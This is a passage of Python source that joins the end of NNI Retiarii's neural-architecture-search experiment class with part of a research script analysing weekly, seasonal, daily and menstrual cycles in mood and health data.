if mutators is not None and applied_mutators:
raise RuntimeError('Have not supported mixed usage of LayerChoice/InputChoice and mutators, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
applied_mutators = mutators
return base_model_ir, applied_mutators
def debug_mutated_model(base_model, trainer, applied_mutators):
"""
Locally run only one trial without launching an experiment, for debugging purposes, then exit.
For example, it can be used to quickly check shape mismatch.
Specifically, it applies mutators (default to choose the first candidate for the choices)
to generate a new model, then run this model locally.
Parameters
----------
base_model : nni.retiarii.nn.pytorch.nn.Module
the base model
trainer : nni.retiarii.evaluator
the training class of the generated models
applied_mutators : list
a list of mutators that will be applied on the base model for generating a new model
"""
base_model_ir, applied_mutators = preprocess_model(base_model, trainer, applied_mutators)
from ..strategy import _LocalDebugStrategy
strategy = _LocalDebugStrategy()
strategy.run(base_model_ir, applied_mutators)
_logger.info('local debug completed!')
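# Rough end-to-end usage sketch (assumption, simplified from typical Retiarii
# examples; base_model, evaluator and strategy are placeholders):
#
#     exp = RetiariiExperiment(base_model, evaluator, [], strategy)
#     exp_config = RetiariiExeConfig('local')
#     exp_config.trial_concurrency = 2
#     exp_config.max_trial_number = 20
#     exp.run(exp_config, 8081)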
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
base_model_ir, self.applied_mutators = preprocess_model(
self.base_model, self.trainer, self.applied_mutators,
full_ir=self.config.execution_engine not in ['py', 'benchmark'],
dummy_input=self.config.dummy_input
)
_logger.info('Start strategy...')
self.strategy.run(base_model_ir, self.applied_mutators)
_logger.info('Strategy exit')
# TODO: find out a proper way to show no more trial message on WebUI
# self._dispatcher.mark_experiment_as_ending()
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in the background.
This method will raise an exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
atexit.register(self.stop)
# we will probably need an execution engine factory to make this clean and elegant
if self.config.execution_engine == 'base':
from ..execution.base import BaseExecutionEngine
engine = BaseExecutionEngine()
elif self.config.execution_engine == 'cgo':
from ..execution.cgo_engine import CGOExecutionEngine
# assert self.config.trial_gpu_number==1, "trial_gpu_number must be 1 to use CGOExecutionEngine"
assert self.config.batch_waiting_time is not None
devices = self._construct_devices()
engine = CGOExecutionEngine(devices,
max_concurrency=self.config.max_concurrency_cgo,
batch_waiting_time=self.config.batch_waiting_time)
elif self.config.execution_engine == 'py':
from ..execution.python import PurePythonExecutionEngine
engine = PurePythonExecutionEngine()
elif self.config.execution_engine == 'benchmark':
from ..execution.benchmark import BenchmarkExecutionEngine
engine = BenchmarkExecutionEngine(self.config.benchmark)
set_execution_engine(engine)
self.id = management.generate_experiment_id()
if self.config.experiment_working_directory is not None:
log_dir = Path(self.config.experiment_working_directory, self.id, 'log')
else:
log_dir = Path.home() / f'nni-experiments/{self.id}/log'
nni.runtime.log.start_experiment_log(self.id, log_dir, debug)
self._proc, self._pipe = launcher.start_experiment_retiarii(self.id, self.config, port, debug)
assert self._proc is not None
assert self._pipe is not None
self.port = port # port will be None if start up failed
# dispatcher must be launched after pipe initialized
# the logic to launch dispatcher in background should be refactored into dispatcher api
self._dispatcher = self._create_dispatcher()
self._dispatcher_thread = Thread(target=self._dispatcher.run)
self._dispatcher_thread.start()
ips = [self.config.nni_manager_ip]
for interfaces in psutil.net_if_addrs().values():
for interface in interfaces:
if interface.family == socket.AF_INET:
ips.append(interface.address)
ips = [f'http://{ip}:{port}' for ip in ips if ip]
msg = 'Web UI URLs: ' + colorama.Fore.CYAN + ' '.join(ips) + colorama.Style.RESET_ALL
_logger.info(msg)
exp_status_checker = Thread(target=self._check_exp_status)
exp_status_checker.start()
self._start_strategy()
# TODO: the experiment should be completed, when strategy exits and there is no running job
_logger.info('Waiting for experiment to become DONE (you can ctrl+c if there are no running trial jobs)...')
exp_status_checker.join()
def _construct_devices(self):
devices = []
if hasattr(self.config.training_service, 'machine_list'):
for machine in self.config.training_service.machine_list:
for gpu_idx in machine.gpu_indices:
devices.append(GPUDevice(machine.host, gpu_idx))
else:
for gpu_idx in self.config.training_service.gpu_indices:
devices.append(GPUDevice('local', gpu_idx))
return devices
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function blocks until the experiment finishes or fails.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
self.start(port, debug)
def _check_exp_status(self) -> bool:
"""
Periodically check the experiment status.
This function blocks until the experiment finishes or fails.
Return `True` when the experiment is done; return `False` when it failed.
"""
try:
while True:
time.sleep(10)
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
status = self.get_status()
else:
return False
if status == 'DONE' or status == 'STOPPED':
return True
if status == 'ERROR':
return False
except KeyboardInterrupt:
_logger.warning('KeyboardInterrupt detected')
finally:
self.stop()
def stop(self) -> None:
"""
Stop background experiment.
"""
_logger.info('Stopping experiment, please wait...')
atexit.unregister(self.stop)
# stop strategy first
if self._dispatcher_thread is not None:
self._dispatcher.stopping = True
self._dispatcher_thread.join(timeout=1)
if self.id is not None:
nni.runtime.log.stop_experiment_log(self.id)
if self._proc is not None:
try:
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
rest.delete(self.port, '/experiment')
except Exception as e:
_logger.exception(e)
_logger.warning('Cannot gracefully stop experiment, killing NNI process...')
kill_command(self._proc.pid)
if self._pipe is not None:
self._pipe.close()
self.id = None
self.port = None
self._proc = None
self._pipe = None
self._dispatcher = None
self._dispatcher_thread = None
_logger.info('Experiment stopped')
def export_top_models(self, top_k: int = 1, optimize_mode: str = 'maximize', formatter: str = 'dict') -> Any:
"""
Export several top performing models.
For one-shot algorithms, only top-1 is supported. For others, ``optimize_mode`` and ``formatter`` are
available for customization.
Parameters
----------
top_k : int
How many models are intended to be exported.
optimize_mode : str
``maximize`` or ``minimize``. Not supported by one-shot algorithms.
``optimize_mode`` is likely to be removed and defined in strategy in future.
formatter : str
Support ``code`` and ``dict``. Not supported by one-shot algorithms.
If ``code``, the python code of the model will be returned.
If ``dict``, the mutation history will be returned.
"""
if formatter == 'code':
assert self.config.execution_engine != 'py', 'You should use `dict` formatter when using Python execution engine.'
if isinstance(self.trainer, BaseOneShotTrainer):
assert top_k == 1, 'Only top_k == 1 is supported for now.'
return self.trainer.export()
else:
all_models = filter(lambda m: m.metric is not None, list_models())
assert optimize_mode in ['maximize', 'minimize']
all_models = sorted(all_models, key=lambda m: m.metric, reverse=optimize_mode == 'maximize')
assert formatter in ['code', 'dict'], 'Export formatter other than "code" and "dict" is not supported yet.'
if formatter == 'code':
return [model_to_pytorch_script(model) for model in all_models[:top_k]]
elif formatter == 'dict':
return [get_mutation_dict(model) for model in all_models[:top_k]]
def retrain_model(self, model):
"""
This function retrains the exported model and tests it to report test accuracy.
"""
raise NotImplementedError
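# A minimal usage sketch of the class above (illustrative only; `MyModelSpace`,
# `my_evaluator` and `my_strategy` are assumed to be defined by the user, and the way
# RetiariiExeConfig is constructed here is an assumption, not taken from this file):
#
#     exp = RetiariiExperiment(MyModelSpace(), my_evaluator, applied_mutators=None, strategy=my_strategy)
#     exp_config = RetiariiExeConfig('local')
#     exp.run(exp_config, port=8080)
#     print(exp.export_top_models(top_k=1, optimize_mode='maximize', formatter='dict'))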
|
compare_to_seasonal_cycles.py
|
from constants_and_util import *
import pandas as pd
from traceback import print_exc
import random
import numpy as np
from scipy.signal import argrelextrema
import statsmodels.api as sm
import warnings
import statsmodels.formula.api as smf
from copy import deepcopy
import json
from IPython import embed
from collections import Counter
from scipy.stats import pearsonr, linregress
import time
import string
import cPickle
import math
import dataprocessor
from scipy.special import expit
from multiprocessing import Process, Manager
import datetime
import matplotlib.pyplot as plt
from scipy.stats import scoreatpercentile
import sys
try:
    from mpl_toolkits.basemap import Basemap  # needed by make_basemap below; optional so the rest of the module still imports without basemap
except ImportError:
    Basemap = None
import matplotlib as mpl
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from matplotlib.patches import PathPatch
import matplotlib.gridspec as gridspec
import gc
def load_all_results(continuous_only=False):
"""
Loads in a dictionary of results.
(results for each mood pair are saved in their own file; this combines them).
checked.
"""
print("Loading in analysis results from %s" % base_results_dir)
results = {}
for filename in os.listdir(base_results_dir):
if continuous_only and 'continuous' not in filename:
continue
if FILTER_FOR_VERY_ACTIVE_LOGGERS_IN_ALL_ANALYSIS and 'VERY_ACTIVE_LOGGERS_' not in filename:
continue
if ('versus' in filename) and (('n_chunks_to_use_%i' % n_chunks_to_use) in filename):
t0 = time.time()
print 'Adding %s to results' % filename
d = cPickle.load(open(os.path.join(base_results_dir, filename), 'rb'))
assert len(d.keys()) == 1
results.update(d)
print("Time to load %s: %2.3f seconds" % (filename, time.time() - t0))
for i in range(len(results)):
print '%i. %s' % (i + 1, results.keys()[i])
return results
def get_amplitude_standard_error_from_regression_data(regression_data, cycle):
"""
Compute the standard error of the cycle amplitude given the fitted linear-regression coefficients,
by resampling the coefficients while taking their covariances into account.
"""
raise Exception("Not using at present because it seems potentially sketchy, using bootstraps. If you use this, need to check it.")
regression_data = deepcopy(regression_data)
# computing amplitude the old way. Verified this yields the same results if covariance = 0.
simple_mean_format = convert_regression_format_to_simple_mean_format(regression_data,
'linear_regression')
amplitude = get_cycle_amplitude(simple_mean_format,
cycle,
metric_to_use='max_minus_min',
hourly_period_to_exclude=None)
assert cycle in ['date_relative_to_period', 'month', 'weekday', 'local_hour']
param_names = regression_data['params'].index
if cycle == 'date_relative_to_period':
cycle_idxs = param_names.map(lambda x:('date_relative_to_period' in x) and
(np.abs(float(x.split('[T.')[1].replace(']', ''))) <= 14))
assert cycle_idxs.sum() == 28
else:
cycle_idxs = param_names.map(lambda x:cycle in x)
if cycle == 'local_hour':
assert cycle_idxs.sum() == 23
elif cycle == 'month':
assert cycle_idxs.sum() == 11
elif cycle == 'weekday':
assert cycle_idxs.sum() == 6
cov_matrix = deepcopy(regression_data['covariance_matrix'])
beta_hat = deepcopy(regression_data['params'])
assert (cov_matrix.index == beta_hat.index).all()
cov_matrix = cov_matrix.values
beta_hat = beta_hat.values
n_samples = 10000
sample = np.random.multivariate_normal(beta_hat, cov_matrix, size=[n_samples,])
assert sample.shape[1] == len(cycle_idxs)
sample_for_cycle = sample[:, cycle_idxs]
sample_for_cycle = np.hstack([sample_for_cycle, np.zeros([n_samples,1])])
max_vals = sample_for_cycle.max(axis=1)
min_vals = sample_for_cycle.min(axis=1)
sampled_amplitudes = max_vals - min_vals
assert (sampled_amplitudes > 0).all()
assert min(sampled_amplitudes) < amplitude
assert max(sampled_amplitudes) > amplitude
err_95 = 1.96 * np.std(sampled_amplitudes)
#lower_CI = scoreatpercentile(sampled_amplitudes, 2.5)
#upper_CI = scoreatpercentile(sampled_amplitudes, 97.5)
#print 'Lower CI: %2.3f; upper CI %2.3f' % (lower_CI, upper_CI)
#print amplitude, sampled_amplitudes.mean()
return err_95, err_95 # lower and upper errorbars.
def get_cycle_amplitude(data, cycle, metric_to_use, hourly_period_to_exclude):
"""
Given data (eg results[opposite_pair][substratification][substratification_level]['take_simple_means_by_group_no_individual_mean']),
a cycle, and a metric to use (max_minus_min or average_absolute_difference_from_mean),
computes the cycle amplitude.
"""
data = deepcopy(data)
assert metric_to_use in ['max_minus_min' ,'average_absolute_difference_from_mean']
assert cycle in ['date_relative_to_period', 'local_hour', 'weekday', 'month', 'week_of_year']
if cycle == 'date_relative_to_period':
data[cycle] = data[cycle].loc[data[cycle].index.map(lambda x:np.abs(x) <= 14)]
assert list(data[cycle].index) == list(range(-14, 15))
if cycle == 'local_hour':
if hourly_period_to_exclude is None:
assert list(data[cycle].index) == list(range(24))
else:
assert len(hourly_period_to_exclude) == 2
assert hourly_period_to_exclude[0] < hourly_period_to_exclude[1]
data[cycle] = data[cycle].loc[data[cycle].index.map(lambda x:(x < hourly_period_to_exclude[0]) or (x > hourly_period_to_exclude[1]))]
assert list(data[cycle].index) == [a for a in list(range(24)) if a < hourly_period_to_exclude[0] or a > hourly_period_to_exclude[1]]
if cycle == 'weekday':
assert list(data[cycle].index) == list(['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday',
'Wednesday'])
if cycle == 'month':
assert list(data[cycle].index) == list(range(1, 13))
if cycle == 'week_of_year':
assert list(data[cycle].index) == list(range(52))
y = np.array(data[cycle]['mean'])
y_mu = y.mean()
average_absolute_difference_from_mean = np.mean(np.abs(y - y_mu))
largest_difference = y.max() - y.min()
if metric_to_use == 'max_minus_min':
metric_val = largest_difference
else:
metric_val = average_absolute_difference_from_mean
return metric_val
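# Worked example of the two metrics above (numbers are made up): if the seven weekday
# means are [0.03, -0.01, 0.02, 0.00, -0.02, 0.01, -0.03] (mean 0.0), then
#   max_minus_min                         = 0.03 - (-0.03) = 0.06
#   average_absolute_difference_from_mean = mean(|y - mean(y)|) = 0.12 / 7 ~= 0.017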
def make_basemap(country_vals, bin_edges, bin_edge_labels, title_string, filename=None, plot_colorbar=True):
"""
Given a dictionary which maps country names to values
a list of bin edges (numbers) (which must span the min and max values)
a list of bin edge labels (strings)
and a title,
makes a map.
Checked.
"""
fig = plt.figure(figsize=[7, 5])
ax = fig.add_subplot(111)
from matplotlib.colors import LinearSegmentedColormap
colors = ['#023eff', '#ffffff', '#e8000b']#[(1, 0, 0), (1, 1, 1), (0, 0, 1)]
cm_fxn = LinearSegmentedColormap.from_list(
'mycmap', colors, N=256)
#cm_fxn = plt.get_cmap(cmap_coloring)
num_bins = len(bin_edges) - 1
assert len(bin_edges) == len(bin_edge_labels)
color_scheme = [cm_fxn((i + 1) / (1.*num_bins + 1)) for i in range(num_bins)] # normalization is + 1 so that the middle bin is .5.
cmap_for_legend = mpl.colors.ListedColormap(color_scheme) # we use this to make the color scheme in the legend.
m = Basemap(llcrnrlat = -60, urcrnrlat = 85, llcrnrlon = -180, urcrnrlon=180, resolution='l', fix_aspect = True)
m.drawmapboundary(fill_color='white')
m.fillcontinents(color='#dddddd',lake_color='white')
m.readshapefile('country_shapefile/UIA_World_Countries_Boundaries',
'UIA_World_Countries_Boundaries', drawbounds = False)
patches = []
facecolors = []
countries_not_found = list(set(country_vals.keys()))
for info, shape in zip(m.UIA_World_Countries_Boundaries_info, m.UIA_World_Countries_Boundaries):
# loop over the patches which make up countries.
# For each patch, if it's in the list of countries we passed in, color it appropriately.
def map_to_my_country_names(x):
# small helper method to render names consistent.
if x == 'United Kingdom':
return 'Britain (UK)'
elif x == 'South Korea':
return 'Korea (South)'
elif x == 'Russian Federation':
return 'Russia'
elif x == 'Trinidad and Tobago':
return 'Trinidad & Tobago'
elif x == "C\xc3\xb4te d'Ivoire":
return "Cte d'Ivoire"
elif x == 'Bosnia and Herzegovina':
return 'Bosnia & Herzegovina'
elif x == 'Brunei Darussalam':
return 'Brunei'
elif x == 'The Former Yugoslav Republic of Macedonia':
return 'Macedonia'
return x
country_name = map_to_my_country_names(info['Country'])
if country_name in country_vals:
country_val = country_vals[country_name]
if not ((country_val < np.max(bin_edges)) and (country_val > np.min(bin_edges))):
raise Exception("%s, value %2.3f is out of range of bins" % (country_name, country_val))
bin_idx = int(np.digitize(country_val, bin_edges))
# digitize documentation: Each index i returned is such that bins[i-1] <= x < bins[i] if bins is monotonically increasing
bin_idx = bin_idx - 1 # smallest value of bin_idx will be 0; largest will be num_bins - 1.
assert bin_idx >= 0
# So bin_idx = 0 means you're in color_scheme[0].
# This is sort of hard to check by hand so I just made maps with fake data to check it.
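# Small worked example of the binning (values are illustrative): with
# bin_edges = [0, 1, 2, 3] (so num_bins = 3) and country_val = 1.5,
# np.digitize returns 2, so bin_idx = 1 and the country is drawn with
# color_scheme[1], the bin covering values in [1, 2).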
facecolors.append(color_scheme[bin_idx])
patches.append(Polygon(np.array(shape), True) )
#facecolors.append('red')
if country_name in countries_not_found:
countries_not_found.remove(country_name)
#else:
# facecolors.append('lightgrey')
# patches.append(Polygon(np.array(shape), True) )
print("Warning: the following countries could not be mapped because they were not found in mapping data")
print countries_not_found
ax.add_collection(PatchCollection(patches, facecolor=facecolors, edgecolor='k', linewidths=1., zorder=2))
plt.title(title_string, fontsize=16, fontweight='bold')
if plot_colorbar:
# Add legend
ax_legend = fig.add_axes([0.2, 0.15, 0.6, 0.03], zorder=3)
cb = mpl.colorbar.ColorbarBase(ax_legend, cmap=cmap_for_legend, ticks=range(num_bins + 1), boundaries=range(num_bins + 1), orientation='horizontal')
cb.ax.set_xticklabels(bin_edge_labels, fontsize=14, fontweight='bold')
fig.subplots_adjust(top=.95, left=.02, right=.98, bottom=.05)
if filename is not None:
fig.savefig(filename, dpi=300)
plt.show()
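# A hypothetical call to make_basemap (assuming basemap and the shapefile above are
# available; the country values, bin edges and labels here are purely illustrative):
#
#     make_basemap({'Brazil': 0.12, 'France': -0.05},
#                  bin_edges=[-0.2, -0.1, 0, 0.1, 0.2],
#                  bin_edge_labels=['-20%', '-10%', '0%', '+10%', '+20%'],
#                  title_string='Example map')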
def analyze_individual_specific_interactions_between_cycles(results):
"""
Checked. Analyzes whether individuals who have larger effects in one cycle have larger effects in another cycle.
mu here is the mean when the cycle indicator is TRUE minus the mean when the cycle indicator is FALSE.
"""
results = deepcopy(results)
all_pvals = []
for emotion_pair in results:
person_specific_interactions = results[emotion_pair]['no_substratification']['person_specific_interaction_between_cycles']
for cycle_pair in person_specific_interactions.keys():
all_pvals.append({'emotion':emotion_pair,
'cycle_pair':cycle_pair,
'p':person_specific_interactions[cycle_pair]['p'],
'r':person_specific_interactions[cycle_pair]['r'],
'abs_r':np.abs(person_specific_interactions[cycle_pair]['r']),
'n':person_specific_interactions[cycle_pair]['n'],
'mu_1':person_specific_interactions[cycle_pair]['mu_1'],
'mu_2':person_specific_interactions[cycle_pair]['mu_2']})
if person_specific_interactions[cycle_pair]['p'] < 1e-5:
plt.figure()
plt.title(cycle_pair + '\n' + emotion_pair + '\nr = %2.3f, p = %2.3e' % (person_specific_interactions[cycle_pair]['r'],
person_specific_interactions[cycle_pair]['p']))
plt.scatter(person_specific_interactions[cycle_pair]['full_effects_1'],
person_specific_interactions[cycle_pair]['full_effects_2'])
plt.xlim(-1, 1)
plt.ylim(-1, 1)
plt.show()
all_pvals = pd.DataFrame(all_pvals).sort_values(by = 'p')
return all_pvals
def analyze_non_individual_specific_interactions_between_cycles(results):
"""
Checked. Analyzes non individual-specific interactions between cycles.
"""
results = deepcopy(results)
all_pvals = []
pd.set_option('display.width', 500)
for emotion_pair in results:
regression = results[emotion_pair]['no_substratification']['interaction_between_cycles']['linear_regression']
raw_means = results[emotion_pair]['no_substratification']['interaction_between_cycles']['raw_means']
for pair_of_cycles in regression:
# loop over pairs of cycles
# get the interaction coefficient for each one
interaction_coef = [a for a in regression[pair_of_cycles]['pvalues'].index if ':' in a][0]
pval = float(regression[pair_of_cycles]['pvalues'].loc[interaction_coef])
beta = float(regression[pair_of_cycles]['betas'].loc[interaction_coef])
raw_mean_vals = raw_means[pair_of_cycles].reset_index()
assert np.all(raw_mean_vals[raw_mean_vals.columns[0]] == [False, False, True, True])
assert np.all(raw_mean_vals[raw_mean_vals.columns[1]] == [False, True, False, True])
if pval < 1e-5:
# make a plot for all statistically significant interactions
plt.figure(figsize = [10, 5])
xticks = []
vals = list(raw_mean_vals['good_mood'].values)
assert len(vals) == 4
col0 = raw_mean_vals.columns[0]
col1 = raw_mean_vals.columns[1]
assert col0 in ['summer', 'winter', 'weekend', 'middle_of_night', 'near_period']
assert col1 in ['summer', 'winter', 'weekend', 'middle_of_night', 'near_period']
for i in range(4):
xticks.append(str(col0) + ':' + str(raw_mean_vals[col0].iloc[i]) + '\n' +
str(col1) + ':' + str(raw_mean_vals[col1].iloc[i]))
x_positions = [0, 1, 3, 4]
plt.bar(x_positions, vals, width = 1) # space out bars.
plt.title('%s\n%s\n%2.3e' % (emotion_pair, pair_of_cycles, pval))
plt.xticks(x_positions, xticks)
plt.ylim([-.05, .05])
plt.show()
all_pvals.append({'emotion':emotion_pair,
'coef':interaction_coef,
'pval':pval,
'beta':beta})
all_pvals = pd.DataFrame(all_pvals)
all_pvals = all_pvals.loc[all_pvals['pval'] < 1e-5]
pd.set_option('precision', 2)
all_pvals['coef'] = all_pvals['coef'].map(lambda x:x.replace('[T.True]', ''))
all_pvals = all_pvals.sort_values(by = 'pval')[['emotion', 'coef', 'beta', 'pval']]  # sort and keep only the columns of interest before returning
return all_pvals
def extract_most_dramatic_period_bin(data, bin_size):
"""
data should be, eg, results[opposite_pair]['no_substratification']['take_simple_means_by_group_no_individual_mean']
Looks for the bin (of width bin_size) starting between 14 days before the period and the start of the period which shows the most dramatic discrepancy from the rest of the cycle.
"""
data = deepcopy(data)
assert sorted(data.columns) == ['err', 'mean', 'size']
data = data.loc[data.index.map(lambda x:np.abs(x) <= 14)]
assert list(data.index) == range(-14, 15)
# allow the bin to start anywhere from two weeks before the period up to the day the period starts.
min_day = -14
max_day = 0
max_effect = 0
for start_day in range(min_day, max_day + 1):
idxs = data.index.map(lambda day:day >= start_day and day < start_day + bin_size)
idxs = np.array(idxs)
assert np.sum(idxs) == bin_size
effect = data.loc[idxs, 'mean'].mean() - data.loc[~idxs, 'mean'].mean()
if np.abs(effect) > np.abs(max_effect):
max_effect = effect
best_start_day = start_day
print 'maximum effect between days %i and %i (inclusive) is %2.3f, %i<=day<%i' % (min_day,
max_day,
max_effect,
best_start_day,
best_start_day + bin_size)
return best_start_day
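# Sketch of the search above (bin_size is whatever the caller passes; with bin_size = 4,
# for example, the candidate windows are [-14, -10), [-13, -9), ..., [0, 4)): for each
# candidate window we compare the mean inside the window with the mean of all other days
# in [-14, 14], and return the start day of the window with the largest absolute difference.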
def convert_regression_format_to_simple_mean_format(regression_data, type_of_regression, seasonal_variable='month'):
"""
Given data in the regression format -- ie, a dictionary of params and p-values --
converts to the data format make_four_cycle_plots requires.
This is convenient because otherwise we have to have make_four_cycle_plots and make_four_cycle_regression_plots
The size column is not meaningful but is included for compatibility with the other format.
Checked.
"""
assert seasonal_variable in ['month', 'week_of_year']
assert type_of_regression in ['linear_regression', 'mixed_model_regression']
if type_of_regression == 'linear_regression':
assert sorted(regression_data.keys()) == sorted(['95_CI', 'covariance_matrix', 'params', 'pvalues'])
params = regression_data['params']
lower_CI = regression_data['95_CI'][0]
upper_CI = regression_data['95_CI'][1]
assert np.allclose(upper_CI.values - params.values, params.values - lower_CI.values)
assert list(params.index) == list(upper_CI.index)
err = upper_CI - params
else:
print sorted(regression_data.keys())
assert sorted(regression_data.keys()) == ['fixed_effects_coefficients',
'fixed_effects_standard_errors', 'random_effects_covariance', 'random_effects_covariance_errors', 'ranef']
params = regression_data['fixed_effects_coefficients']
err = regression_data['fixed_effects_standard_errors'] * 1.96
cycles_to_loop_over = ['weekday', seasonal_variable, 'local_hour', 'date_relative_to_period']
no_hourly_data = np.sum(params.index.map(lambda x:'local_hour' in x)) == 0
if no_hourly_data:
cycles_to_loop_over.remove('local_hour')
new_data = {}
for cycle in cycles_to_loop_over:
beta = deepcopy(params.loc[params.index.map(lambda x:cycle in x)])
beta_err = deepcopy(err.loc[err.index.map(lambda x:cycle in x)])
if cycle == 'weekday':
missing_val = 'Friday'
weekday_processing_fxn = lambda x:x.replace('C(weekday)[T.', '').replace(']', '')
beta.index = beta.index.map(weekday_processing_fxn)
beta_err.index = beta_err.index.map(weekday_processing_fxn)
elif cycle == 'date_relative_to_period':
# this has to deal with both the mixed model and OLS formulations
# which have slightly different coefficient formats.
# the missing value is 0.
processing_fxn = lambda x:x.replace('C(date_relative_to_period, Treatment(reference=0))[T.', '').replace('C(date_relative_to_period)[T.', '').replace(']', '')
beta.index = beta.index.map(processing_fxn).astype('float')
beta_err.index = beta_err.index.map(processing_fxn).astype('float')
missing_val = 0
else:
non_weekday_processing_fxn = lambda x:x.replace('C(%s)[T.' % cycle, '').replace(']', '')
beta.index = beta.index.map(non_weekday_processing_fxn).astype('float')
beta_err.index = beta_err.index.map(non_weekday_processing_fxn).astype('float')
missing_val = min(beta.index) - 1
# insert coefficient for the missing value, which is 0.
beta = beta.append(pd.Series([0], index=[missing_val]))
assert len(set(beta.index)) == len(beta)
beta = beta.sort_index()
beta_err = beta_err.append(pd.Series([0], index=[missing_val]))
assert len(set(beta_err.index)) == len(beta_err)
beta_err = beta_err.sort_index()
assert list(beta_err.index) == list(beta.index)
new_df = pd.DataFrame({'mean':beta.values,
'size':0.0,
'err':beta_err.values})
new_df.index = beta.index
new_df = new_df[['mean', 'size', 'err']]
new_df.index.name = cycle
if cycle == 'date_relative_to_period':
new_df = new_df.loc[new_df.index.map(lambda x:np.abs(x) <= 14)]
new_data[cycle] = new_df
# if there's no hourly data in the regression (eg, because we have no hourly info) add in zero values so nothing crashes.
if no_hourly_data:
new_data['local_hour'] = pd.DataFrame({'mean':0.0,
'size':0.0,
'err':0.0},
index=range(24))
new_data['local_hour'].index.name = 'local_hour'
for cycle in new_data:
for k in new_data[cycle].columns:
assert np.isnan(new_data[cycle][k].values).sum() == 0
index_labels = list(new_data[cycle][k].index)
if cycle == 'date_relative_to_period':
assert index_labels == range(-14, 15)
elif cycle == 'local_hour':
assert index_labels == range(24)
elif cycle == 'weekday':
# sorted weekday names.
assert index_labels == ['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']
elif cycle == 'month':
assert index_labels == range(1, 13) or index_labels == range(3, 13) # heart rate only has partial data.
elif cycle == 'week_of_year':
assert index_labels == range(52) or index_labels == range(12, 52) # heart rate only has partial data.
return new_data
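# The returned dict maps each cycle name to a DataFrame indexed by the cycle's levels
# (e.g. -14..14 for date_relative_to_period, 0..23 for local_hour) with columns
# ['mean', 'size', 'err']: 'mean' holds the regression coefficients (0 for the reference
# level), 'err' the half-width of the 95% CI, and 'size' is a placeholder kept only for
# compatibility with the simple-means format.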
def make_four_cycle_plots(results,
substratifications,
emotion_pairs,
use_20_day_menstrual_cycle=False,
data_to_use='linear_regression',
ylimits_by_pair=None,
figname=None,
show_errorbars=True,
substratification_levels_to_skip=None,
hourly_period_to_exclude=None,
colors_for_lines=None,
suptitle=True,
include_amplitudes_in_title=True,
different_colors_for_each_cycle=False,
use_expanded_seasonal_x_axis=False):
"""
loop over all substratifications (eg, [by_categorical_latitude]) and all emotion pairs.
plot all four cycles for each (either raw means or regression-adjusted estimates, depending on data_to_use).
If use_20_day_menstrual_cycle = True, extends range slightly for menstrual cycle plot to make sure there
are no super-weird tail effects.
Checked.
"""
assert data_to_use in ['take_simple_means_by_group_no_individual_mean',
'take_simple_means_by_group',
'derivative_estimates_with_no_looparound',
'derivative_estimates_with_looparound',
'linear_regression']
# an annoying warning about future deprecation.
warnings.filterwarnings("ignore", message="Adding an axes using the same arguments as a previous axes currently reuses the earlier instance. In a future version, a new instance will always be created and returned. Meanwhile, this warning can be suppressed, and the future behavior ensured, by passing a unique label to each axes instance.")
if ylimits_by_pair is not None:
assert sorted(ylimits_by_pair.keys()) == sorted(emotion_pairs)
else:
ylimits_by_pair = {}
for pair in emotion_pairs:
if BBT_SUBSTRING in pair:
ylimits_by_pair[pair] = .5
elif HEART_SUBSTRING in pair:
ylimits_by_pair[pair] = 2
elif WEIGHT_SUBSTRING in pair:
ylimits_by_pair[pair] = .4
elif 'sex' in pair or 'exercise' in pair or 'sleep' in pair:
ylimits_by_pair[pair] = 15
else:
ylimits_by_pair[pair] = 10
for substratification in substratifications:
for emotion_pair in emotion_pairs:
plt.figure(figsize = [20, 6])
lines_plotted = 0
n_lines_to_plot = len(results[emotion_pair][substratification].keys())
# extract the levels we want to loop over for the substratification.
if substratification == 'no_substratification':
sorted_levels = [None]
elif all([a in [False, True] for a in results[emotion_pair][substratification].keys()]):
sorted_levels = sorted(results[emotion_pair][substratification].keys())
elif substratification in ['normalization_procedure', 'by_hemisphere', 'by_largest_timezones', 'by_country', 'all_regression_specifications', 'by_any_filtering']:
sorted_levels = sorted(results[emotion_pair][substratification].keys())
else:
# if not boolean substratifications or hemisphere, levels are numeric; sort them in ascending order.
sorted_levels = sorted(results[emotion_pair][substratification].keys(),
key = lambda x:float(x.split()[0].replace('[', '').replace(',', '')))
if substratification_levels_to_skip is not None:
for level in substratification_levels_to_skip:
assert level in sorted_levels
n_lines_to_plot = n_lines_to_plot - 1
sorted_levels.remove(level)
for substratification_level in sorted_levels:
# first extract the data for this substratification and level
if substratification == 'no_substratification':
mean_data = deepcopy(results[emotion_pair][substratification][data_to_use])
else:
mean_data = deepcopy(results[emotion_pair][substratification][substratification_level][data_to_use])
if data_to_use == 'linear_regression':
mean_data = convert_regression_format_to_simple_mean_format(mean_data, 'linear_regression')
# now loop over all four cycles
if 'month' in mean_data:
seasonal_variable = 'month'
elif 'week_of_year' in mean_data:
seasonal_variable = 'week_of_year'
else:
raise Exception("Either month or week of year needs to be in data")
cycles_to_plot = ['date_relative_to_period', 'local_hour', 'weekday', seasonal_variable]
for cycle in cycles_to_plot:
if (cycle == 'local_hour' and
('sex*' in emotion_pair or
'sleep*' in emotion_pair or
'exercise*' in emotion_pair or
